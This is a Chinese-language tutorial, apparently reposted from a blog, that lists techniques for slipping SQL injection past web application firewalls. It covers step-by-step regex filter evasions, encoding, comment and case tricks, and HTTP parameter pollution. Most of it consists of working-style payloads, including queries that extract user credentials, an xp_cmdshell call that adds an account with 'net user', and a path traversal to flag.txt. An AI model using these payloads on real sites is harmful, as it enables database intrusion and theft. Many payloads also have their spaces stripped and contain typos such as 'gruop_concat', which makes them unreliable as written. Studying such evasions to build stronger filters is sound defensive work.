关于SQL注入绕过的一些知识点
一、 绕过waf思路
从第一步起,一点一点去分析,然后绕过。
1、过滤and,or
preg_match('/(and|or)/i',$id) Filteredinjection:1or1=11and1=1 Bypassedinjection:1||1=11&&1=1
2、过滤and,or,union
preg_match('/(and|or|union)/i',$id) Filteredinjection:unionselectuser,passwordfromusers Bypassedinjection:1||(selectuserfromuserswhereuser_id=1)='admin'
3、过滤and,or,union,where
preg_match('/(and|or|union|where)/i',$id) Filteredinjection:1||(selectuserfromuserswhereuser_id=1)='admin' Bypassedinjection:1||(selectuserfromuserslimit1)='admin'
4、过滤and,or,union,where,limit
preg_match('/(and|or|union|where|limit)/i',$id) Filteredinjection:1||(selectuserfromuserslimit1)='admin' Bypassedinjection:1||(selectuserfromusersgroupbyuser_idhavinguser_id=1)='admin'
5、过滤and,or,union,where,limit,groupby
preg_match('/(and|or|union|where|limit|groupby)/i',$id) Filteredinjection:1||(selectuserfromusersgroupbyuser_idhavinguser_id=1)='admin' Bypassedinjection:1||(selectsubstr(gruop_concat(user_id),1,1)userfromusers)=1
6、过滤and,or,union,where,limit,groupby,select
preg_match('/(and|or|union|where|limit|groupby|select)/i',$id) Filteredinjection:1||(selectsubstr(gruop_concat(user_id),1,1)userfromusers)=1 Bypassedinjection:1||1=1intooutfile'result.txt' Bypassedinjection:1||substr(user,1,1)='a'
7、过滤and,or,union,where,limit,groupby,select,‘
preg_match('/(and|or|union|where|limit|groupby|select|\')/i',$id) Filteredinjection:1||(selectsubstr(gruop_concat(user_id),1,1)userfromusers)=1 Bypassedinjection:1||user_idisnotnull Bypassedinjection:1||substr(user,1,1)=0x61 Bypassedinjection:1||substr(user,1,1)=unhex(61)
8、过滤and,or,union,where,limit,groupby,select,‘,hex
preg_match('/(and|or|union|where|limit|groupby|select|\'|hex)/i',$id) Filteredinjection:1||substr(user,1,1)=unhex(61) Bypassedinjection:1||substr(user,1,1)=lower(conv(11,10,36))
9、过滤and,or,union,where,limit,groupby,select,‘,hex,substr
preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr)/i',$id) Filteredinjection:1||substr(user,1,1)=lower(conv(11,10,36)) Bypassedinjection:1||lpad(user,7,1)
10、过滤and,or,union,where,limit,groupby,select,‘,hex,substr,空格
preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr|\s)/i',$id) Filteredinjection:1||lpad(user,7,1) ypassedinjection:1%0b||%0blpad(user,7,1)
二、正则绕过
根据正则的的模糊匹配特性绕过,比如过滤了'='
filteredinjection:1or1=1
Bypassedinjection:1or1,1or‘1',1orchar(97)
eg: filteredinjection:1unionselect1,table_namefrominformation_schema.tableswheretable_name='users' Bypassedinjection:1unionselect1,table_namefrominformation_schema.tableswheretable_namebetween'a'and'z' Bypassedinjection:1unionselect1,table_namefrominformation_schema.tableswheretable_namebetweenchar(97)andchar(122) Bypassedinjection:1unionselect1,table_namefrominformation_schema.tableswheretable_namebetween0x61and0x7a BypassedInjection:1unionselect1,table_namefrominformation_schema.tableswheretable_namelike0x7573657273
三、通用绕过
1.注释符
?id=1+un//ion+se//lect+1,2,3–
2.大小写
?id=1+UnIoN//SeLecT//1,2,3–
3.关键字替换
有些waf等使用preg_replace替换了SQL关键字
?id=1+UNunionION+SEselectLECT+1,2,3-- ?id=1+uni%0bon+se%0blect+1,2,3--
有时候注释符'/**/‘可能被过滤,也可以使用%0b绕过
Forbidden:http://localhost/id/1/**/||/**/lpad(first_name,7,1).html Bypassed:http://localhost/id/1%0b||%0blpad(first_name,7,1).html
4.编码
一个经典的脚本:Nukesentinel.php
//CheckforUNIONattack //Copyright2004(c)RavenPHPScripts $blocker_row=$blocker_array[1]; if($blocker_row['activate']>0){ if(stristr($nsnst_const['query_string'],'+union+')OR\ stristr($nsnst_const['query_string'],'%20union%20')OR\ stristr($nsnst_const['query_string'],'*/union/*')OR\ stristr($nsnst_const['query_string'],'union')OR\ stristr($nsnst_const['query_string_base64'],'+union+')OR\ stristr($nsnst_const['query_string_base64'],'%20union%20')OR\ stristr($nsnst_const['query_string_base64'],'*/union/*')OR\ stristr($nsnst_const['query_string_base64'],'union')){//block_ip($blocker_row); die("BLOCKIP1"); } }
Forbidden:http://localhost/php/?/**/union/**/select Bypassed:http://localhost/php/?/%2A%2A/union/%2A%2A/select Bypassed:http://localhost/php/?%2f**%2funion%2f**%2fselect
5.缓冲区溢出
http://localhost/news.php?id=1+and+(select1)=(select0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10–
6.内联注释(mysql)
http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3-- http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
四、高级绕过
1.HPP(http参数污染)
举个例子:
index.php?par1=val1&par1=val2 |webserver|par1| |:—|:—| |ASP.NET/IIS|val1,val2| |ASP/IIS|val1,val2| |PHP/Apache|val2| |JSP/Tomcat|val1|
eg:
在ASP/ASP.NET的环境下
Forbidden:http://localhost/search.aspx?q=selectname,passwordfromusers Bypassed:http://localhost/search.aspx?q=selectname&q=passwordfromusers Bypassed:http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users Bypassed:http://localhost/news.aspx?id=1';/*&id=1*/EXEC/*&id=1*/master..xp_cmdshell/*&id=1*/netusertesttest/*&id=1*/--
2.HPC(http参数污染)
RFC2396定义了如下一些字符:
Unreserved:a-z,A-Z,0-9and_.!~*'() Reserved:;/?:@&=+$, Unwise:{}|\^[]`
不同的Web服务器处理处理构造得特殊请求时有不同的逻辑:
|QueryString|Apache/2.2.16,PHP/5.3.3|IIS6/ASP| |:—|:—|:—| |?test[1=2|test_1=2|test[1=2| |?test=%|test=%|test=| |?test%00=1|test=|test=1| |?test=1%001|NULL|test=1| |?test+d=1+2|test_d=12|testd=12|
eg:
Forbidden:http://localhost/?xp_cmdshell Bypassed:http://localhost/?xp[cmdshell Forbidden:http://localhost/test.asp?file=../flag.txt Bypassed:http://localhost/test.asp?file=.%./flag.txt Forbidden:http://localhost/news.asp?id=10and1=0/(selecttop1table_namefrominformation_schema.tables) Bypassed:http://localhost/news.asp?id=10a%nd1=0/(se%lecttop1ta%ble_namefr%ominfo%rmation_schema.tables)
总结
以上就是关于sql注入绕过的技巧总结,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对毛票票的支持。